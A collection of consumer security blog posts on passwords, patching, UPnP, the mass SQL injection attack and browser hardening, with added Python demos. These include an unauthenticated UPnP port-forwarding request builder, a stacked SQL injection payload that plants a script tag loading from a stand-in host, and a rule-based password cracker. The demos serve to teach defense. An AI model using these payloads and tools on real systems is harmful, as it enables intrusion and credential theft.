Passwords


A question I often ask when giving presentations on computer security is how many people have changed the password on their personal e-mail account in the past year.  In the corporate world, the company can control how often users have to change their work passwords.  The most common answer I get about personal e-mail passwords is that they never have, or maybe once, a couple of years ago.

Now let's think about an attacker who compromises your home PC.  He has installed a keylogger (a program that records a user's keystrokes and sends them back to the attacker's server), and it has recorded you logging in to your personal e-mail account.  OK, now think.  You bank at a large national bank, you have a PayPal account, an eBay account, and many other online accounts that a criminal could take over for his own purposes.  Do those accounts use the same user name and password as your personal e-mail account?  If so, the one password he captured opens all of them, and control of your e-mail also lets him reset the others through their "forgot password" links.  Am I making you think about changing your password and using different user names and passwords for your other accounts?  Hopefully so.

The lesson here is to change your password, and not to share user names and passwords between your e-mail and the financial accounts you have.  Use a strong password: upper and lower case letters, numbers, and special characters, and make it longer than 8 characters.  A passphrase is easier to remember than a random string and can be much longer.

Hope everyone’s weekend is going great and stay safe out there.

This week another attack against legitimate web sites is under way.  Some of the security companies have written articles about it.  Not a lot of detail is known at this time, but the affected sites include several .edu and .gov sites and, as always, a big name.  This time it was Trend Micro, a computer security company; they have since cleaned up the pages that were hacked.  As in the other attacks earlier this year, the web applications themselves were attacked and then served exploits to anyone who visited the site.

An Internet Storm Center diary post lists the vulnerabilities being used in this latest attack.  What do you do to defend against these attacks?  Regular readers have heard it from me before, and the answer is the same.  PATCH!!!!!   Pretty simple.  The weaknesses listed in that post are all Microsoft vulnerabilities that were patched in 2006 and 2007.  Not listed there, but used even more often, are holes in third-party applications like Adobe Reader, RealPlayer, WinZip, WinAmp, and on and on.  Those applications need patches too, so don't forget them.

The Big 12 tournament has started, so I'm pumped up.  Rock Chalk Jayhawk.  GO KU!  That is it for now.  Have a great weekend, and may your favorite team win unless they are playing the Kansas Jayhawks!!

With the latest JavaScript attacks we've been seeing, it is now very important that you take steps to protect yourself from the criminals trying to take advantage of you.  First there were the uc8010 attacks, then the web servers that were compromised so that every web site hosted on them spread crimeware to all who visited.  I've written about both attacks.

So what to do?   It may sound like a broken record, but I'll repeat it here.  Patching your software is important.  Very important.  What tools can you use?  Try Shavlik's Google Gadget.  Click here to get this great tool.  Many of these attacks go after known vulnerabilities, so knowing which of your applications need patching is one of the most important things you can do.  Patching can't protect you from a 0-day attack (one for which no patch exists yet), but it goes a long way.

Run up-to-date anti-virus and anti-malware applications.  I use AVG's AV and anti-malware.  Keep the updates current and run the tools regularly so you can keep things clean.  Click here for these downloads.  Also install a more robust firewall.  I use the free version of Comodo Firewall.  Click here for your free download.

Be VERY careful when opening e-mails.  They may appear to be from someone you know, but you need to be very suspicious of unsolicited e-mails asking for personal information.  Never give that information out, and don't click the links either.  We are already seeing Valentine's malware, along with Super Bowl sites that are really malicious sites.  Then tax time is right around the corner, then Easter, and so on, and so on.  You get the point.  And be VERY careful with e-mails about recent world events like storms, assassinations, or other tragedies: don't click those links.

While we are at it, let's talk strong passwords.  You really ought to protect your financial sites with strong passwords that use upper and lower case letters, numbers, and special characters, that are more than 8 characters long, and that are not the same password you use for your e-mail.

Use a browser other than Microsoft's Internet Explorer.  I use Firefox, with the NoScript add-on as a defense against these latest attacks; it blocks JavaScript from any site you have not explicitly allowed, which is exactly what the injected scripts on compromised sites rely on.  You have to do some work to allow the sites you trust, but in the long run you'll be safer.  It is no guarantee that you will stay safe, but it goes a lot farther than doing nothing at all.

These are just a few things you can do.  Do them all and you will be safer.  I used to say that if you stay away from porn and peer-to-peer sites where music and movies are downloaded illegally, you will stay fairly safe.  With the latest JavaScript attacks hitting legitimate sites, you can't say that anymore.  So take these extra steps and they will keep you safer.

Stay safe, and take steps to protect yourself!

First things first.  Universal Plug and Play (UPnP) is a set of network protocols.  Its goal is to let devices on a home network (and some corporate networks) find and configure each other without any setup by the user; it is used for data sharing, communications, and entertainment.  I won't go any further explaining it.  To be honest, I didn't know much about it until I started reading about the problem with UPnP.  The problem is that UPnP requests carry no authentication: any program running on any device inside your network can ask the router to do things like open ports in its firewall, and the router simply obeys.  OK, that isn't good at all.  Why should you be concerned?  Well, total pwnage is what we are talking about.  Bad people can get control of your router, which has horrible ramifications.  If you want to know more on this subject, Google UPnP and Computer Security to read additional information on this topic.

So here is what we have to do.  First things first.  How can we shut this off?  You probably have a router in your home.  One of the more popular devices is the Linksys WRT54G.  Netgear sells them as well, as do many others.  If you have never logged into your router, let me tell you how to do this.  Open your web browser and type in the IP address assigned to your router.  Let's say you own a WRT54G from Linksys.  Linksys routers use 192.168.1.1 for their internal IP address, so enter the address 'http://192.168.1.1'.  You should be presented with a login screen asking for a user name and password.  If you have never changed the default password on your router, this is a good time to do that as well as turn off UPnP.  If you don't know the default password, go here to find the default user name and password for your router.  This is a great router resource.

Once you have logged in successfully, you will see a web interface.  Normally on the left-hand side of the page you will see the different areas you can check and change.  If you still have the default user name and password, change them immediately.  Then find where UPnP is turned on and turn that bad boy off.  Save the settings, then click log off.  Remember the password you set, and don't set it to a word in the dictionary.

Gnucitizen (a computer security research site) has had several posts since the first of the year on UPnP.  Check out the blog, where they really break down the issues with UPnP.  Their point is: TURN IT OFF!
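To make "no authentication" concrete, here is an added example of what a UPnP conversation with a home router actually looks like on the wire. This is my own illustration written with the Python standard library, not code from Gnucitizen or from any router vendor. The discovery request and the port-forwarding request are the real protocol messages (SSDP M-SEARCH and the IGD AddPortMapping SOAP call); notice that neither contains a user name or password. The IP addresses, the control path and the device description document are made-up sample data so the parsing and request-building parts run offline; only discover() touches the network, and you can run that from a PC behind your router as a quick check: if anything answers, UPnP is still on.

```python
import socket
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SSDP_ADDR = ("239.255.255.250", 1900)   # UPnP discovery multicast group and port
IGD_ST = "urn:schemas-upnp-org:device:InternetGatewayDevice:1"
WANIP_ST = "urn:schemas-upnp-org:service:WANIPConnection:1"
NS = "{urn:schemas-upnp-org:device-1-0}"


def build_msearch(search_target=IGD_ST, mx=2):
    """SSDP discovery request. Note that it carries no credentials of any kind."""
    lines = ["M-SEARCH * HTTP/1.1", "HOST: %s:%d" % SSDP_ADDR,
             'MAN: "ssdp:discover"', "MX: %d" % mx, "ST: %s" % search_target, "", ""]
    return "\r\n".join(lines).encode("ascii")


def parse_ssdp_response(raw):
    """Turn an SSDP reply (HTTP-style text) into a dict of upper-cased headers."""
    status, _, rest = raw.decode("utf-8", "replace").partition("\r\n")
    headers = {"STATUS": status}
    for line in rest.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def find_control_url(description_xml, service_type=WANIP_ST):
    """The LOCATION header points at a device description document; the
    control URL for the WAN connection service is nested inside it."""
    for svc in ET.fromstring(description_xml).iter(NS + "service"):
        if svc.findtext(NS + "serviceType") == service_type:
            return svc.findtext(NS + "controlURL")
    return None


def build_add_port_mapping(host, control_url, external_port, internal_client,
                           internal_port, protocol="TCP", description="demo"):
    """The SOAP request that asks the router to forward an Internet-facing
    port to a LAN host. Returns (request_line, headers, body). Again: no
    user name and no password anywhere in it."""
    args = [("NewRemoteHost", ""), ("NewExternalPort", str(external_port)),
            ("NewProtocol", protocol), ("NewInternalPort", str(internal_port)),
            ("NewInternalClient", internal_client), ("NewEnabled", "1"),
            ("NewPortMappingDescription", escape(description)),
            ("NewLeaseDuration", "0")]
    body = ('<?xml version="1.0"?><s:Envelope '
            'xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            '<s:Body><u:AddPortMapping xmlns:u="' + WANIP_ST + '">'
            + "".join("<%s>%s</%s>" % (k, v, k) for k, v in args)
            + "</u:AddPortMapping></s:Body></s:Envelope>")
    headers = {"HOST": host, "CONTENT-TYPE": 'text/xml; charset="utf-8"',
               "CONTENT-LENGTH": str(len(body)),
               "SOAPACTION": '"%s#AddPortMapping"' % WANIP_ST}
    return "POST %s HTTP/1.1" % control_url, headers, body


def discover(timeout=2.0):
    """Send one M-SEARCH on the LAN and collect whatever answers (network I/O;
    run this by hand from a PC behind your router)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    found = []
    try:
        sock.sendto(build_msearch(), SSDP_ADDR)
        while True:
            data, addr = sock.recvfrom(65507)
            found.append((addr[0], parse_ssdp_response(data)))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return found


# Constructed sample data (made-up addresses and paths) so the rest runs offline.
SAMPLE_REPLY = (b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\nEXT:\r\n"
                b"LOCATION: http://192.168.1.1:1900/igd.xml\r\n"
                b"SERVER: Linux/2.4, UPnP/1.0, Router/1.0\r\n"
                b"ST: " + IGD_ST.encode() + b"\r\n"
                b"USN: uuid:11111111-2222-3333-4444-555555555555::" + IGD_ST.encode() + b"\r\n\r\n")
SAMPLE_DESCRIPTION = (
    '<?xml version="1.0"?><root xmlns="urn:schemas-upnp-org:device-1-0"><device>'
    '<deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>'
    '<deviceList><device><deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>'
    '<deviceList><device><deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>'
    '<serviceList><service><serviceType>' + WANIP_ST + '</serviceType>'
    '<controlURL>/upnp/control/WANIPConn1</controlURL></service></serviceList>'
    '</device></deviceList></device></deviceList></device></root>')

if __name__ == "__main__":
    hdr = parse_ssdp_response(SAMPLE_REPLY)
    ctl = find_control_url(SAMPLE_DESCRIPTION)
    line, headers, body = build_add_port_mapping("192.168.1.1:1900", ctl, 8080, "192.168.1.50", 80)
    print(hdr["LOCATION"], ctl)
    print(line, headers["SOAPACTION"], body, sep="\n")
    for ip, h in discover():             # an empty list means nothing answered
        print("UPnP device answered:", ip, h.get("SERVER"), h.get("LOCATION"))
```

The router never asks who is sending the AddPortMapping request, which is why a piece of malware on one PC (or, as Gnucitizen showed, a web page you visit) can punch a hole in the firewall for the whole house. Turning UPnP off in the router is the only reliable fix; if discover() still gets an answer after you save the setting, the change didn't take.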

Stay safe and stay warm.  I’m freezing where I am!  Rock Chalk Jayhawk GO KU!!

In my previous post I gave a quick review of this story, but because of what I do for a living as a computer security professional, I've dug deeper and will try to explain it in plain language.

On or around 4 January, there was an automated attack on thousands of websites. Initial reports were that 70,000 legitimate sites had been compromised, but now the number is estimated at 94,000 sites. These included Fortune 500 corporations, state government agencies, and schools. These sites were infected with malicious code that attempts to engage in click fraud and steal online game credentials from people who visit the destinations.

Here is a short list of sites known to have been compromised. At this writing some have been fixed. Smaller organizations without dedicated staff to maintain their web applications probably remain compromised.

Computer Associates
United Nations
City of Cleveland
State of Virginia
Boston University

Additional sites currently turning up in a Google search:

webdeveloper-dot-com
bbc-dot-org
livingbeyondbreastcancer-dot-org
livingbeyondbreastcancer-dot-net
livingbeyondbreastcancer-dot-com
livingbeyondbreastcancer-dot-us
builderonline-dot-com
residentialarchitect-dot-com
pharmacychecker-dot-com
supplementwatch-dot-com
hospitalseating-dot-com
The attackers breached the sites through a SQL injection vulnerability in the sites' own web applications (database-driven pages running against Microsoft SQL Server). It is worth being clear about what that means. SQL injection is not a hole in SQL Server that a vendor patch fixes. It is a bug in the site's own code, which takes something the visitor supplied (a page id in the URL, a search box) and pastes it straight into a database query, so the site's developers have to fix it themselves by validating input and using parameterized queries. The injected content was JavaScript that redirected every visitor to two rogue sites in China (uc8010-dot-com and ucmal-dot-com), which then tried to exploit several vulnerabilities on the visitor's PC to install key-logging software that stole passwords and CD keys for various online games.

Click fraud can include several things. Google, for instance, uses a ranking system that determines where a site shows up on the search results page, and attackers have been gaming it so that their malicious sites land at or near the top when someone searches, which increases traffic to those sites.

The uc8010-dot-com domain was registered in late December through a Chinese registrar, which suggests the attackers are fluent in Chinese. Whatever the keylogger collected was sent off to a location the attackers controlled, and a keylogger does not stop at game passwords: it records every keystroke the user types. Since the attack was scripted, the attackers surely had a scripted way to sift through everything that came in, so any logon credentials were lost, along with e-mails, documents typed, web sites browsed, credentials for any web site, and so on. The vulnerabilities exploited on the visitor's PC were an old RealPlayer vulnerability and an older Microsoft vulnerability from 2006. You have heard me say that patching is so important to keeping yourself safe, and I will repeat it again. Patch, patch, patch!!
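Here is an added example of the class of bug that let the attackers rewrite these sites' content. It is my own illustration using a throwaway SQLite database, not code from any of the affected sites or from the attackers. The table, the page id parameter and the injected script address (example.invalid) are all made up for illustration. SQLite's executescript() stands in for a database driver that runs several statements from one request, which is what classic ASP pages talking to SQL Server do, and that is the behaviour that let a single web request append a script tag to every page in the database.

```python
import sqlite3

# Stand-in for the script tag the attackers appended to page content;
# the host name is deliberately unresolvable.
INJECTED = '<script src="http://example.invalid/0.js"></script>'

# What an attacker puts in the ?id= parameter of a page URL. Attacks of this
# kind usually encode the payload to slip past naive filters; the idea is
# the same.
PAYLOAD = "1; UPDATE pages SET body = body || '" + INJECTED + "'"


def make_db():
    """Constructed sample content, in place of a real site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, hits INTEGER)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?, 0)", [
        (1, "Home", "Welcome to our site."),
        (2, "News", "Latest news."),
    ])
    conn.commit()
    return conn


def vulnerable_count_hit(conn, page_id):
    """A hit counter that pastes the URL parameter into the SQL text.
    executescript() mimics a driver that runs stacked statements, so the
    attacker's second statement runs against every row in the table."""
    conn.executescript("UPDATE pages SET hits = hits + 1 WHERE id = " + page_id)
    conn.commit()


def safe_count_hit(conn, page_id):
    """The fix: check the type, then bind the value as a parameter so the
    database never interprets the visitor's text as SQL."""
    pid = int(page_id)          # raises ValueError for anything that isn't a number
    conn.execute("UPDATE pages SET hits = hits + 1 WHERE id = ?", (pid,))
    conn.commit()


def render_page(conn, page_id):
    """What every later visitor receives. If the stored body was altered,
    the HTML served to them carries the attacker's script tag."""
    row = conn.execute("SELECT title, body FROM pages WHERE id = ?", (page_id,)).fetchone()
    return "<h1>%s</h1><p>%s</p>" % row


def defaced_pages(conn):
    """Count rows whose body now contains a script tag: a quick check a site
    owner can run against their own content tables."""
    return conn.execute("SELECT COUNT(*) FROM pages WHERE body LIKE '%<script%'").fetchone()[0]


if __name__ == "__main__":
    conn = make_db()
    vulnerable_count_hit(conn, PAYLOAD)
    print(defaced_pages(conn), "pages defaced")      # 2
    print(render_page(conn, 2))                       # News page now carries the script tag

    conn = make_db()
    try:
        safe_count_hit(conn, PAYLOAD)
    except ValueError:
        print("rejected bad page id")
    print(defaced_pages(conn), "pages defaced")      # 0
```

The visitor who sent the poisoned request never sees anything unusual; it is everyone who loads the site afterwards who gets the script. That is why a compromised site can look perfectly normal to its own staff while it is infecting its readers, and why the fix belongs in the site's code rather than in a Microsoft patch.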
I haven't seen a complete list of compromised sites, so I can't tell you whether you have visited one. If you think you have, you may want to reload your PC. I've had postings telling you how to do this. I think a reload at least once a year is a good idea anyway.
Hey stay safe and be good out there.

As a new year approaches, many of us make resolutions for the coming year. Nothing should be different when it comes to computer security, so I thought I would help you out. First things first: please care about computer security. In this post I refer back to some of my prior posts that explain why you should care. It reminds me of the old joke. "Doctor, Doctor! It hurts when I do this!!!" The doctor says, "Don't do that!!!" Computer security is kind of like that. You can tell people what to avoid and which behaviors to change, and they choose to ignore the suggestions, the same way kids choose not to do what you tell them. So here are my computer security resolutions.

1. Care about computer security. Bad guys would love to get control of your PC. Click here to see why.

2. Steps to take in 2008. Click here to see them.

3. Get smarter! I’ll try and help teach you what steps to take to not be a victim. Click here to see how.

4. Change passwords to a more secure password. Click here to see why.

5. Be careful when going mobile. If you have a laptop and travel, take caution when connecting to wireless AP’s. Click here to see why.

6. Change your Internet behavior. Click here to see what I mean.

If you can't tell, I am rather passionate about what I do for a living. If I can help someone avoid having their ID or credit card information stolen, I'll feel much better. Hopefully this outlet has let me help you some this year. I hope you will continue to read my posts. I will try to keep them current, and yes, I'll probably repeat myself on certain topics. That is because the bad guys are always looking for a new way to entice you to click on an attachment or a link in an unsolicited e-mail. Please let me know if you find this information helpful. I think one of my most popular posts is the one on how to find the SSID on a wireless router.

Stay safe this New Year's Eve and have fun. I talk some about my KC Chiefs, and all I can tell you is I'm glad this season is almost over. My Kansas University Jayhawks are in the Orange Bowl on January 3. We are getting into the heart of the NCAA basketball season and my Hawks are ranked number 3 right now. They look good. I'm looking forward to another great year, so stay safe while online and we'll talk again after the New Year!

Hi. It’s been a few days since my last post. In my part of the world, we had a pretty bad ice storm and power was knocked out and my internet connection was out for a few days. It’s snowing now so I’m really in a Winter Wonderland!

In a previous post I mentioned that Apple's QuickTime had a security problem with no patch. Well, late Thursday Apple released a new version, 7.3.1. If Apple's updater hasn't notified you that there is a new version, just open QuickTime and it will tell you. Update it now. This vulnerability is being exploited in the wild, which means bad people are sending spam e-mail right now with malformed QuickTime files, and if they trick you into opening one, they can do bad things. Any time you hear the words "remote code execution" associated with a vulnerability, it means the bad people can run their own programs on your PC: add keyloggers, steal cookies, steal files. That should scare you into patching your software. If you are an iTunes person, just grab the iTunes download, because QuickTime comes with iTunes.

Just remember that as the holiday season comes in, bad people send many different kinds of spam e-mail, from e-cards to official-looking notices: "you've changed your password on PayPal", or your financial institution wanting you to click a link inside the e-mail and type in your banking credentials so they can steal you blind.

Play it smart. Remember, NEVER trust e-mails. Always question before you go and type in account numbers, passwords, PINs, etc. Stay safe, and if you are in the middle of the country, drive safely. That is all for now. I'll try to post another story before Monday.

Halloween is over and it is now November 1, 2007.  I love this time of year.  The weather starts to cool down and I love Thanksgiving and Christmas time.  Remember that you must stay alert when surfing the Internet, though.  I have said it more than once, and you can read what other computer security professionals say too: your behavior has a huge impact on whether you fall prey to an attacker's ever-changing methods.  Let's say you have for some reason lost all sense and opened an e-mail that really piqued your interest, and lo and behold, malicious programs get downloaded to your PC and now a remote attacker in Russia has complete control of it.  And let's say one of the programs the attacker installed reads "files of interest".  What do you think those would be?

Well, let's review what we do on the PC.  Do you keep bank account information on it, or bank online?  Is your browser set to save user IDs and passwords for convenience?  If your browser asks whether you'd like to save the password you just entered, and you have saved your logon credentials for, say, PayPal, your bank, investment accounts, or any other financial institution, that saved-password file is exactly what an attacker finds attractive.  How about this.  Do you prepare your own taxes, probably with one of the most popular tax preparation applications, TurboTax?  Those files are saved with a known file extension that an attacker can search for, and what is in a tax file is just about everything someone would need to perform a little identity theft.

Here are some settings I use in my browser for a little more safety.  I don't save passwords.  Not a good idea.  I also set my Firefox browser to delete cookies and other history files as soon as I close the browser.  Don't leave any of those files on the PC for an attacker to find; back up what you need to a CD and keep it in a safe place.  If you use Firefox, go to Tools|Options and click on the Privacy tab.  In the History section at the top, uncheck the 3 boxes and set the number of days to keep history to 0.  In the Cookies section below it, leave cookies accepted but set the "keep until" option to when you close Firefox.  In the Private Data section at the bottom, check the box that clears your private data when Firefox closes, and uncheck the next box that asks you to confirm before it deletes those files.  Then go to the Security tab and check the first 2 boxes, which warn you when a site tries to install an add-on and tell you when you visit a suspected forged site, and select the first radio button under them.  In the Passwords section in the middle of that tab, uncheck the first box, the one that offers to remember user IDs and passwords for sites.

If you use Microsoft Internet Explorer or another browser, find the settings equivalent to the Firefox ones and do the same there.  Or just switch to Firefox now; I'm sure you'll be much happier.

These settings give an attacker fewer targets to go after.  Go check the settings on your browser and start surfing smarter today.  Take care, and I hope you had a Happy Halloween.  Don't eat too much candy.  I did, and REALLY need to lose weight.  Rock Chalk Jayhawk go KU!!!

In the corporate world, companies can force you to follow certain rules: requiring letters in both upper and lower case, special characters, and numbers, as well as a minimum password length. When I ask people when they last changed their passwords at home, the usual answer is that they haven't for a long time, or never.

Passwords that are dictionary words can be cracked very quickly. You must use strong passwords even at home. Think of all the web sites where you have accounts and what the user IDs and passwords are. Are your e-mail address and password the same on several of those accounts? The answer is probably yes. Attackers know this too, and once they obtain your e-mail address and password they may have the keys to your bank accounts, PayPal credentials, stock accounts, and many others. Most browsers ask whether you would like to save your sign-on credentials. Never save your IDs and passwords. When a PC is hacked, attackers like to harvest files, and the saved ID and password files are a favorite because they can lead the attacker to financial gain at your expense.

Think about your IDs and passwords, change them to stronger ones, and where the site allows it, make your user ID something other than your e-mail address. Stay safe! Have a happy Halloween!!!

I just thought we could review the steps you can take to stay protected today. Several of these have been covered in more detail in other posts so this will be high level. If you see one on this list and it hasn’t been covered, we’ll just post a future article on the specific step.

1. Patch all software. This includes Microsoft as well as everyone else: Apple, WinZip, WinAmp, RealPlayer, Macromedia, Adobe, and any other software you have. Many of the patches companies issue are security patches.

2. Install anti-virus and anti-spyware software, keep the signatures current by downloading them daily, and run a scan at least once a day, if not more often.

3. If you have wireless, log onto your wireless access point and change the SSID from the default name, change the default user name if the device allows it, and change the default password. Review the logs on the router periodically, and use WPA2 for encryption. Not broadcasting your SSID and turning on MAC filtering are often suggested too. They will keep out a casual neighbor, but not a determined attacker, since both the SSID and the allowed MAC addresses can be read right off the air by anyone listening, so don't rely on them in place of WPA2 and a strong key.

4. Use an alternative browser instead of Microsoft Internet Explorer. I personally use Firefox.

5. If needed, change your Internet behavior. This includes knowing what types of social engineering tactics are being used and how to avoid them. A useful resource for this is the Internet Storm Center link in my blogroll.

6. If you have kids, teach them the basics of Internet safety. Random clicking and trusting everyone is not safe, and they must be told. Too much information on social networking sites is dangerous too, so YOU the parent should audit what is being posted on Facebook, MySpace, and the many other sites out there.

7. Instant messaging is used by kids and adults alike. Know that you must patch these applications too, and don't reply to strangers. Don't always trust links from 'friends' either. Sometimes friends get hacked, and the attacker sends out a malicious link to a web site the attacker controls, or an invitation to view their webcam or a picture. This is one of the social engineering tactics attackers use.

8. At least once a year, especially if you have a college student with a PC connected to the college network, have a professional wipe the hard drive and reload the software, then download all the patches needed to bring it current. I recommend this for the family PC too.

9. If you have kids, purchase filtering software so you can limit what your kids can see. This can keep your kids from going to bad sites. (Porn)

10. Download and use a firewall. Pay attention to the alerts given and make sure you know what you are allowing.

11. Don't surf porn or use peer-to-peer sites to get movies and MP3 files for free. You may get more than you bargained for; this is a known avenue attackers use to spread their malware. It is also illegal to download copyrighted material.

12. Windows and the browsers can 'remember' passwords for you. Think about it from an attacker's point of view. Those passwords are stored in files on the hard drive, and attackers know what the files are called. If malicious software gets onto your machine, the attacker will look for files of interest, and the saved-password files could contain the user IDs and passwords for your bank, investment account, etc.

13. Backup your files periodically. This includes your files you’ve purchased from iTunes as well as documents and family pictures you may have loaded on your PC’s hard drive.

14. Use strong passwords. Dictionary words can be cracked VERY quickly by password cracking programs. Use more than 8 characters and mix in upper and lower case, numbers, and special characters. A passphrase is always a good choice.

15. Set up an administrator account that you use only for maintaining the PC, then create accounts without administrator privileges for everyday use and surfing the net. Attackers trick you into installing their software; if the account you are using doesn't have the rights to install anything, that is another layer of protection.

16. Use the Finjan Firefox plugin so when you do searches, this can tell you if the site is safe or not.
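Step 14 above, and the same advice in the earlier posts on this page, says dictionary passwords fall quickly and that a passphrase is a good choice. Here is an added example that shows why, written by me for this page rather than taken from any of the posts or from a real cracking tool. It mimics what a password cracker does (take a word list, apply a few mangling rules, hash each guess and compare), then generates a random passphrase the same cracker cannot find, and compares the size of the search space for each. The word list is a tiny constructed sample standing in for a real dictionary of millions of words; the unsalted SHA-256 hash is only there to make the cracking step concrete, and the 7776-word figure used in the entropy comparison is the size of a standard diceware list.

```python
import hashlib
import math
import secrets

# Constructed sample dictionary; a real cracking word list has millions of entries.
WORDLIST = ["password", "letmein", "jayhawk", "football", "sunshine", "dragon",
            "monkey", "welcome", "qwerty", "baseball", "princess", "shadow"]
DICEWARE_SIZE = 7776   # words in a standard diceware list
PRINTABLE = 94         # upper + lower + digits + the special characters on a US keyboard


def hash_password(pw):
    """Unsalted SHA-256, purely so the cracking loop has something to compare."""
    return hashlib.sha256(pw.encode()).hexdigest()


def candidates(words):
    """The mangling rules every cracker applies: the word as-is, Capitalized,
    UPPER, each with '!' or a number or a year tacked on the end. That is all
    it takes to turn 'password' into 'Password1'."""
    for w in words:
        for base in (w, w.capitalize(), w.upper()):
            yield base
            yield base + "!"
            for n in range(100):
                yield base + str(n)
            for year in range(1950, 2011):
                yield base + str(year)


def crack(target_hash, words=WORDLIST):
    """Try every candidate; return (password, guesses) or (None, guesses)."""
    guesses = 0
    for guess in candidates(words):
        guesses += 1
        if hash_password(guess) == target_hash:
            return guess, guesses
    return None, guesses


def make_passphrase(n_words=4, words=WORDLIST, sep="-"):
    """Pick words uniformly at random with the OS CSPRNG, never random.choice()."""
    return sep.join(secrets.choice(words) for _ in range(n_words))


def entropy_bits(length, alphabet_size):
    """Bits of search space for a secret chosen uniformly at random: a password
    of `length` symbols from `alphabet_size`, or a passphrase of `length` words
    from a list of `alphabet_size` words."""
    return length * math.log2(alphabet_size)


def bits_for_guesses(n_guesses):
    """How much 'strength' a password that falls after n guesses really had."""
    return math.log2(n_guesses)


if __name__ == "__main__":
    found, n = crack(hash_password("Password1"))
    print("%s cracked after %d guesses (about %.0f bits)" % (found, n, bits_for_guesses(n)))
    phrase = make_passphrase()
    print("passphrase:", phrase, "-> cracker finds:", crack(hash_password(phrase))[0])
    print("random 8 chars, 94 symbols: %.1f bits" % entropy_bits(8, PRINTABLE))
    print("4 diceware words:           %.1f bits" % entropy_bits(4, DICEWARE_SIZE))
    print("6 diceware words:           %.1f bits" % entropy_bits(6, DICEWARE_SIZE))
```

"Password1" satisfies the usual rule (upper, lower, a digit, 8+ characters) and still falls in well under a thousand guesses, because it is a dictionary word plus a rule the cracker already knows. Four words chosen at random from a real diceware list have about the same search space as a truly random 8-character password and are far easier to remember; six words are out of reach of any offline cracker. The word has to be picked by the dice or the program, not by you: "rockchalkjayhawk" is a phrase a cracker will also try.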

This is a pretty good list. If there are any that I may have left off, I’ll add those to this list so you can review this posting or I’ll just add them to future postings. If we haven’t covered these steps yet in postings, I’ll cover them soon. If you ever have a question, don’t hesitate to ask and I’ll try and answer it to the best of my ability. Have a great weekend and ROCK CHALK JAYHAWK GO KU! Big game tonight in College Station.
